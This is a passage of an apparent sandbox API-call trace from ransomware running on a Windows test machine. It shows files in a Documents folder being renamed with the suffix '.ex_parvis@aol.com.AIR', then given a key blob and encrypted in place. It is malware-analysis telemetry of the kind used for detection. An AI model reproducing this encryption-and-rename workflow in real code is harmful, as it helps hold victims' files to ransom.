	[0099.902] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x12d4f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x12d4f, lpOverlapped=0x0) returned 1
	[0099.904] SetFilePointer (in: hFile=0x380, lDistanceToMove=-77135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.904] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x12d4f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x12d4f, lpOverlapped=0x0) returned 1
	[0099.904] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.904] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.904] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls", dwFileAttributes=0x80) returned 1
	[0099.905] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls") returned 64
	[0099.905] GetProcessHeap () returned 0x540000
	[0099.905] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x56b448
	[0099.905] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls"
	[0099.905] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.905] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qokw9xeafktviuc7uhb.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qokw9xeafktviuc7uhb.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.907] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qokw9XeafKTvIuc7uhB.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qokw9xeafktviuc7uhb.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.908] GetProcessHeap () returned 0x540000
	[0099.908] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.908] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=21714) returned 1
	[0099.908] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x54d2
	[0099.908] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.908] GetProcessHeap () returned 0x540000
	[0099.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.908] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.908] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.909] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.909] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.909] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x54d2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x54d2, lpOverlapped=0x0) returned 1
	[0099.909] SetFilePointer (in: hFile=0x380, lDistanceToMove=-21714, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.909] WriteFile (in: hFile=0x380, lpBuffer=0x607098*, nNumberOfBytesToWrite=0x54d2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607098*, lpNumberOfBytesWritten=0x3a1f778*=0x54d2, lpOverlapped=0x0) returned 1
	[0099.911] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.911] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.911] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx", dwFileAttributes=0x80) returned 1
	[0099.911] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx") returned 52
	[0099.911] GetProcessHeap () returned 0x540000
	[0099.911] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.911] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx"
	[0099.911] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.911] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqvpgc.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqvpgc.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.913] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pqvpGC.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqvpgc.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.913] GetProcessHeap () returned 0x540000
	[0099.913] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.913] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=47676) returned 1
	[0099.914] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xba3c
	[0099.914] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.914] GetProcessHeap () returned 0x540000
	[0099.914] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.914] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.914] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.915] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.915] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.915] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0xba3c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0xba3c, lpOverlapped=0x0) returned 1
	[0099.916] SetFilePointer (in: hFile=0x380, lDistanceToMove=-47676, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.916] WriteFile (in: hFile=0x380, lpBuffer=0x60d600*, nNumberOfBytesToWrite=0xba3c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60d600*, lpNumberOfBytesWritten=0x3a1f778*=0xba3c, lpOverlapped=0x0) returned 1
	[0099.916] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.916] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.916] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf", dwFileAttributes=0x80) returned 1
	[0099.916] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf") returned 62
	[0099.916] GetProcessHeap () returned 0x540000
	[0099.916] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x598b60
	[0099.916] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf"
	[0099.916] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.917] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pdzfp4o9bjbz1rq-1.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pdzfp4o9bjbz1rq-1.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.919] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PdZfP4o9bJbZ1rQ-1.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pdzfp4o9bjbz1rq-1.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.919] GetProcessHeap () returned 0x540000
	[0099.919] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.919] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3120) returned 1
	[0099.919] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xc30
	[0099.919] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.919] GetProcessHeap () returned 0x540000
	[0099.919] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.919] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.919] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.920] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.920] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.920] ReadFile (in: hFile=0x380, lpBuffer=0x3a20048, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesRead=0x3a1f778*=0xc30, lpOverlapped=0x0) returned 1
	[0099.920] SetFilePointer (in: hFile=0x380, lDistanceToMove=-3120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.920] WriteFile (in: hFile=0x380, lpBuffer=0x601bb8*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesWritten=0x3a1f778*=0xc30, lpOverlapped=0x0) returned 1
	[0099.921] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.921] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.921] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx", dwFileAttributes=0x80) returned 1
	[0099.921] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx") returned 56
	[0099.921] GetProcessHeap () returned 0x540000
	[0099.921] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x598b60
	[0099.921] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx"
	[0099.921] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.921] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mfwyp0jquh.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mfwyp0jquh.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.923] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MfWYP0jQuh.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mfwyp0jquh.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.923] GetProcessHeap () returned 0x540000
	[0099.923] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.923] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17004) returned 1
	[0099.923] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x426c
	[0099.923] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.923] GetProcessHeap () returned 0x540000
	[0099.923] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.923] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.924] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.924] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.924] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.925] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x426c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x426c, lpOverlapped=0x0) returned 1
	[0099.925] SetFilePointer (in: hFile=0x380, lDistanceToMove=-17004, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.925] WriteFile (in: hFile=0x380, lpBuffer=0x605e30*, nNumberOfBytesToWrite=0x426c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605e30*, lpNumberOfBytesWritten=0x3a1f778*=0x426c, lpOverlapped=0x0) returned 1
	[0099.926] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.926] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.926] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt", dwFileAttributes=0x80) returned 1
	[0099.926] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt") returned 58
	[0099.926] GetProcessHeap () returned 0x540000
	[0099.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x598b60
	[0099.926] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt"
	[0099.926] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.926] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mck-mrigqyxds.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mck-mrigqyxds.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.929] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\McK-mRigqYxDS.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mck-mrigqyxds.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.929] GetProcessHeap () returned 0x540000
	[0099.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.929] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=34375) returned 1
	[0099.929] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8647
	[0099.929] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.929] GetProcessHeap () returned 0x540000
	[0099.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.929] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.929] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.930] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.930] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.930] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x8647, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8647, lpOverlapped=0x0) returned 1
	[0099.931] SetFilePointer (in: hFile=0x380, lDistanceToMove=-34375, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.931] WriteFile (in: hFile=0x380, lpBuffer=0x60a208*, nNumberOfBytesToWrite=0x8647, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60a208*, lpNumberOfBytesWritten=0x3a1f778*=0x8647, lpOverlapped=0x0) returned 1
	[0099.931] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.931] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
